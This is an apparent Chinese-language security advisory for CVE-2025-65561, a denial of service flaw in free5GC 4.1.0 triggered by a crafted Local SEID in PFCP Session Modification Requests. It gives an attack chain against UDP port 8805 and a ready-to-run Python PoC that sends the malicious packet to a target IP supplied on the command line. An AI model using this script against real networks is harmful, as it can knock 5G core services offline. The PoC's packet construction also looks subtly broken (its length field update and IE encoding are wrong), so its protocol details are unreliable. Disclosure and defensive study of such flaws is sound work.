free5GC 4.1.0 LocalNode.Sess函数拒绝服务漏洞 (CVE-2025-65561)

漏洞信息

漏洞编号

CVE-2025-65561

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

free5GC 4.1.0

漏洞概述

CVE-2025-65561是free5GC 4.1.0版本中的一个拒绝服务漏洞。该漏洞存在于free5GC的LocalNode.Sess函数中，攻击者可以通过发送精心构造的PFCP（Packet Forwarding Control Protocol）Session Modification Request消息，利用其中的Local SEID字段触发漏洞。free5GC是一个开源的5G核心网（5GC）实现，遵循3GPP标准规范开发。PFCP协议是5G网络中控制面与用户面分离架构的重要组成部分，用于管理会话建立、修改和删除等操作。当攻击者构造恶意的Local SEID header时，可能导致服务崩溃、拒绝服务或产生其他未指定的负面影响。由于该漏洞无需认证即可利用（CVSS评分7.5），攻击者可以通过网络远程触发此漏洞，对5G核心网的可用性造成严重威胁。

技术细节

该漏洞的核心问题在于free5GC 4.1.0中LocalNode.Sess函数对输入的Local SEID字段处理不当。PFCP协议中的SEID（Session Endpoint Identifier）用于唯一标识一个PFCP会话，攻击者可以在PFCP Session Modification Request中注入恶意构造的Local SEID值。当程序处理这个异常值时，可能导致内存访问错误、空指针引用或逻辑处理异常，最终引发进程崩溃或服务中断。攻击者利用此漏洞无需任何认证凭证，只需能够与free5GC的控制面服务建立网络连接即可。通过发送特制的PFCP消息包，攻击者可以在短时间内造成服务不可用，影响5G网络的正常运营。由于free5GC常用于测试环境和研究场景，该漏洞对部署在生产环境的5G核心网构成实际威胁。

攻击链分析

STEP 1

步骤1

攻击者识别目标free5GC 4.1.0服务，通常监听在8805端口（PFCP协议默认端口）

STEP 2

步骤2

构造恶意的PFCP Session Modification Request消息，设置异常的Local SEID值

STEP 3

步骤3

通过UDP协议将恶意数据包发送到目标free5GC控制面服务

STEP 4

步骤4

free5GC的LocalNode.Sess函数处理异常Local SEID时触发内存错误或逻辑异常

STEP 5

步骤5

导致free5GC服务崩溃或进入异常状态，造成5G核心网拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-65561 PoC - free5GC LocalNode.Sess DoS
This PoC demonstrates sending a crafted PFCP Session Modification Request
with malicious Local SEID to trigger denial of service in free5GC 4.1.0
"""

import socket
import struct
import random

def create_pfcp_header(msg_type, flags=0x20):
    """Create PFCP header
    Flags: Version(3 bits) = 1, MTI(1 bit) = 0, SPM(1 bit) = 1 (Set Message Type)
    """
    version_flags = (1 << 5) | flags  # Version=1, SPM=1
    message_type = msg_type
    message_length = 0  # Will be updated with actual length
    return struct.pack('!BBH', version_flags, message_type, message_length)

def create_ie(ie_type, ie_data):
    """Create Information Element with Type-Length-Value format"""
    ie_type_encoded = ie_type << 4 | 0x01  # Type and length format
    ie_length = len(ie_data)
    # IE header: Type(4 bits) + Length(4 bits) + Type extension(8 bits) + Length(16 bits)
    ie_header = struct.pack('!BBH', ie_type_encoded, 0, ie_length)
    return ie_header + ie_data

def create_malicious_local_seid():
    """Create malicious Local SEID that may trigger vulnerability"""
    # Use invalid or unexpected SEID value
    return struct.pack('!Q', random.randint(0xFFFFFFFF00000000, 0xFFFFFFFFFFFFFFFE))

def create_pfcp_session_modification_request():
    """Create PFCP Session Modification Request with malicious Local SEID"""
    # PFCP Header: Session Modification Request (Type 51)
    pfcp_header = create_pfcp_header(51)
    
    # Create IE: Node ID (IE Type 77)
    node_id = b'\x00\x00\x00\x01'  # IPv4 Node ID
    ie_node_id = create_ie(77, node_id)
    
    # Create malicious Local SEID (IE Type 0x59)
    malicious_seid = create_malicious_local_seid()
    ie_local_seid = create_ie(0x59, malicious_seid)
    
    # Build message
    message = pfcp_header + ie_node_id + ie_local_seid
    
    # Update message length in header (excluding first 4 bytes)
    msg_len = len(message) - 4
    message = message[:4] + struct.pack('!H', msg_len) + message[6:]
    
    return message

def exploit(target_ip, target_port=8805):
    """Send malicious PFCP packet to trigger vulnerability"""
    print(f"[*] Target: {target_ip}:{target_port}")
    print("[*] Creating malicious PFCP Session Modification Request...")
    
    payload = create_pfcp_session_modification_request()
    print(f"[*] Payload length: {len(payload)} bytes")
    print(f"[*] Payload (hex): {payload.hex()}")
    
    try:
        print("[*] Sending malicious packet...")
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        sock.sendto(payload, (target_ip, target_port))
        print("[+] Packet sent successfully")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])

影响范围

free5GC < 4.1.0 (可能受影响)

free5GC = 4.1.0 (确认受影响)

go-upf (相关组件可能受影响)

防御指南

临时缓解措施

在网络边界对PFCP流量进行过滤，限制对8805端口的访问，仅允许授权的UPF（User Plane Function）和SMF（Session Management Function）设备访问。部署网络监控告警，当检测到异常的PFCP Session Modification Request时及时告警。如条件允许，可暂时禁用非必要的PFCP会话修改功能，等待官方补丁发布后进行升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65561
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65561
3 Details https://www.cvedetails.com/cve/CVE-2025-65561/
4 VulDB https://vuldb.com/cve/CVE-2025-65561
5 Link https://github.com/free5gc/free5gc/issues/730
6 Link https://github.com/free5gc/go-upf/pull/80
7 Link https://github.com/free5gc/free5gc/issues/730